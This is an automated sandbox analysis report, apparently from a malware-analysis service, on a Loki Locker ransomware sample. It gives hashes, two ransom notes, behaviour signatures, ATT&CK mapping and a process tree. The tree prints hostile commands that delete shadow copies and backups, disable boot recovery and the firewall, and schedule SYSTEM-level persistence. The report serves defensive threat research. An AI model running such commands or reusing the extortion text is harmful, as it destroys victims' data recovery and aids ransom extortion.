Analysis

  • max time kernel
    600s
  • max time network
    361s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    03-01-2022 04:32

General

  • Target

    d4rkw4ve@tutanota.com.exe

  • Size

    489KB

  • MD5

    ad81961ccc571e985d35e6f30d396859

  • SHA1

    39dc8ac32563d88a11dee49137a0353b46f3eb38

  • SHA256

    630e24cc1c4c95321965ad967e77e1888c48c4b1f653d800c7df08e879814787

  • SHA512

    2d08c947b382b8633c1e055a8bbc57ae7b83f9a3a3ea1ac38080c52acc3fb928a2e199588b8cb0160494be03e6d42d4ae414d292e9e3838a6850cde1369aa8d8

Malware Config

Extracted

Path

C:\Restore-My-Files.txt

Ransom Note
!!!All of your files are encrypted!!! To decrypt them send e-mail to this address: d4rkw4ve@tutanota.com In case of no answer in 24h, send e-mail to this address: dark4wave@yandex.com All your files will be lost on Wednesday, February 2, 2022 4:33:45 AM. Your SYSTEM ID : 1607E57B
Emails

d4rkw4ve@tutanota.com

dark4wave@yandex.com

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note
All your files have been encrypted by Loki locker! All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send an email d4rkw4ve@tutanota.com You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool. You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay Double . In case of no answer in 24 hours (1 Day) write to this email dark4wave@yandex.com Your unique ID is : 1607E57B You only have LIMITED time to get back your files! If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED. You will lose some of your data on day 2 in the timer. You can buy more time for pay. Just email us. THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) What is our decryption guarantee? Before paying you can send us up to for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) Attention! DO NOT pay any money before decrypting the test files. DO NOT trust any intermediary. they wont help you and you may be victim of scam. just email us , we help you in any steps. DO NOT reply to other emails. ONLY this two emails can help you. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

d4rkw4ve@tutanota.com

dark4wave@yandex.com

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 29 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 2 IoCs
  • Modifies registry class 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d4rkw4ve@tutanota.com.exe
    "C:\Users\Admin\AppData\Local\Temp\d4rkw4ve@tutanota.com.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3476
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4436
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:4480
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvt5v2ad\uvt5v2ad.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4500
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA738.tmp" "c:\ProgramData\CSCD7D9D7DD0D34F968BC25FA8464381EE.TMP"
        3⤵
          PID:4568
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4760
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin delete shadows /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:2492
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
        2⤵
          PID:4780
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
          2⤵
            PID:4828
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
            2⤵
              PID:4860
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
              2⤵
                PID:4896
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4964
                • C:\Windows\SysWOW64\netsh.exe
                  netsh advfirewall set currentprofile state off
                  3⤵
                    PID:3824
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5024
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall set opmode mode=disable
                    3⤵
                      PID:4260
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4804
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3416
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    2⤵
                      PID:2324
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      2⤵
                        PID:2288
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                        2⤵
                          PID:1256
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                          2⤵
                            PID:3648
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                            2⤵
                              PID:2336
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3152

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Execution

                          Scheduled Task

                          1
                          T1053

                          Persistence

                          Modify Existing Service

                          2
                          T1031

                          Registry Run Keys / Startup Folder

                          1
                          T1060

                          Scheduled Task

                          1
                          T1053

                          Privilege Escalation

                          Scheduled Task

                          1
                          T1053

                          Defense Evasion

                          Modify Registry

                          4
                          T1112

                          Disabling Security Tools

                          1
                          T1089

                          File Deletion

                          2
                          T1107

                          Discovery

                          System Information Discovery

                          1
                          T1082

                          Impact

                          Inhibit System Recovery

                          2
                          T1490

                          Defacement

                          1
                          T1491

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\452zjcpi.exe
                            MD5

                            6456f1b47ac39df354a59db0c443f59a

                            SHA1

                            b40af78de5e5be12df5c36c7785b2015102494ff

                            SHA256

                            a99a166762c3f9b4e678828edbfd49e6acb32058fee7ea6f8b1abf89a73e6eb3

                            SHA512

                            f226bce3d9df69f2de7c5cc52b9c86818d192ecfe33e6426bf0e83ff7e86550ade0c46698feba8fb617facacf0899f3f2e98bcb3a3453a186c3e06f3ed313ee9

                          • C:\Users\Admin\AppData\Local\Temp\RESA738.tmp
                            MD5

                            7a70a289f304044ef16b1306999dadec

                            SHA1

                            48690b8b0274940796dc1aa6e0b18e17c502ad37

                            SHA256

                            29feaec6359970a80021d56227faa7981a06b436c3302681fe65076a15587d27

                            SHA512

                            bdd85680faec149c395080c09eb2b82442ff213ce412ece6b535e2bfbb29093fb33e2255ed9e090faed77161b03d5eb93ec85c90e2f44315e868d51619b94a53

                          • C:\Users\Admin\AppData\Local\Temp\info.hta
                            MD5

                            b522d3b331849a376373afe80ba5d01d

                            SHA1

                            d91732c6739dffe7abe5baf92278d8e90ec7f2ba

                            SHA256

                            a444c957d451a810e3b18578e0dc23ddf479f02b233984cbb728316c9407e8bb

                            SHA512

                            265d3bd0a41cfe7f40a903d1247b4d6ab6614bf4cbfb8d1e9e0c7afa9d4fdf3b59c83d9db4c80976e2123ef7ceba1919da9c2ec7f1e0b26935c8d018097cde2a

                          • \??\c:\ProgramData\CSCD7D9D7DD0D34F968BC25FA8464381EE.TMP
                            MD5

                            8abbdc6d926579b927ea394808f2c44f

                            SHA1

                            3144a2a1c3c9982a3a606a070983f98cea1a9f8e

                            SHA256

                            2ae57feafcc8edafdf71de27cd5b21620a4fd8f35d642122cfd572606dfb3568

                            SHA512

                            46b870c1de81d7694be07303017bf4b78dd03d12d82424caafdc431cae9ac39351c09f736a268d5e93ef8b8177878ccad64927e27699276fff86fee5958fbd73

                          • \??\c:\Users\Admin\AppData\Local\Temp\ug5eoeim.ico
                            MD5

                            dbc49b5f7714255217080c2e81f05a99

                            SHA1

                            4de2ef415d66d2bb8b389ba140a468b125388e19

                            SHA256

                            6d2f1f6164cbd331b9dc43b37948372e21b2ee45407aa99e199693835cded09c

                            SHA512

                            29a65eb7403bfc220fd057c2e6ea11b29bff545dfce2d3370ad462c66b03ae7f648efd480305423a49440de199a2a94c41214877b226a42dc2d1650683d149bb

                          • \??\c:\Users\Admin\AppData\Local\Temp\uvt5v2ad\uvt5v2ad.0.cs
                            MD5

                            69ffa9cc03972f30e15f26cd9eb7dbb2

                            SHA1

                            03f489b2ec66958fea4b20ba75494298a72439fa

                            SHA256

                            a5cdc42c009f51f7ba43c4ca635a801958baad7523847e3ca0e34135e3eb93c1

                            SHA512

                            0eceed327c153917cad590a37754348808cb13d1cc5785e743deb97d00ccfeee62ba2e126108a6491380a03201b23e801feba3a2875b9a2f31e5376114fdf6de

                          • \??\c:\Users\Admin\AppData\Local\Temp\uvt5v2ad\uvt5v2ad.cmdline
                            MD5

                            62e73cf5bbdc9bea434d4a0827542765

                            SHA1

                            b81732c223be653f2a717d7a31c0977f18988467

                            SHA256

                            4bb572e47c368089993926ca332669cdc1fcdb886bb2b59b062e475791ab85f2

                            SHA512

                            c4cc4000b25c1c694fbf481bebe9485809f2341215c7d2641830faa6fc4ef4aa44ae678693cfa1089173cbd2c3c0ffcbe444c9813cb3de6bc0f6f6d49a59f967

                          • memory/1256-145-0x0000000000000000-mapping.dmp
                          • memory/2288-144-0x0000000000000000-mapping.dmp
                          • memory/2324-143-0x0000000000000000-mapping.dmp
                          • memory/2336-147-0x0000000000000000-mapping.dmp
                          • memory/2492-139-0x0000000000000000-mapping.dmp
                          • memory/3416-142-0x0000000000000000-mapping.dmp
                          • memory/3476-119-0x0000000004F70000-0x0000000004F92000-memory.dmp
                            Filesize

                            136KB

                          • memory/3476-118-0x0000000005240000-0x00000000052B6000-memory.dmp
                            Filesize

                            472KB

                          • memory/3476-117-0x0000000005000000-0x0000000005066000-memory.dmp
                            Filesize

                            408KB

                          • memory/3476-116-0x00000000050A0000-0x0000000005132000-memory.dmp
                            Filesize

                            584KB

                          • memory/3476-115-0x0000000000740000-0x00000000007C4000-memory.dmp
                            Filesize

                            528KB

                          • memory/3476-120-0x0000000005330000-0x0000000005331000-memory.dmp
                            Filesize

                            4KB

                          • memory/3648-146-0x0000000000000000-mapping.dmp
                          • memory/3824-141-0x0000000000000000-mapping.dmp
                          • memory/4260-140-0x0000000000000000-mapping.dmp
                          • memory/4436-121-0x0000000000000000-mapping.dmp
                          • memory/4480-122-0x0000000000000000-mapping.dmp
                          • memory/4500-123-0x0000000000000000-mapping.dmp
                          • memory/4568-127-0x0000000000000000-mapping.dmp
                          • memory/4760-131-0x0000000000000000-mapping.dmp
                          • memory/4780-132-0x0000000000000000-mapping.dmp
                          • memory/4804-133-0x0000000000000000-mapping.dmp
                          • memory/4828-134-0x0000000000000000-mapping.dmp
                          • memory/4860-135-0x0000000000000000-mapping.dmp
                          • memory/4896-136-0x0000000000000000-mapping.dmp
                          • memory/4964-137-0x0000000000000000-mapping.dmp
                          • memory/5024-138-0x0000000000000000-mapping.dmp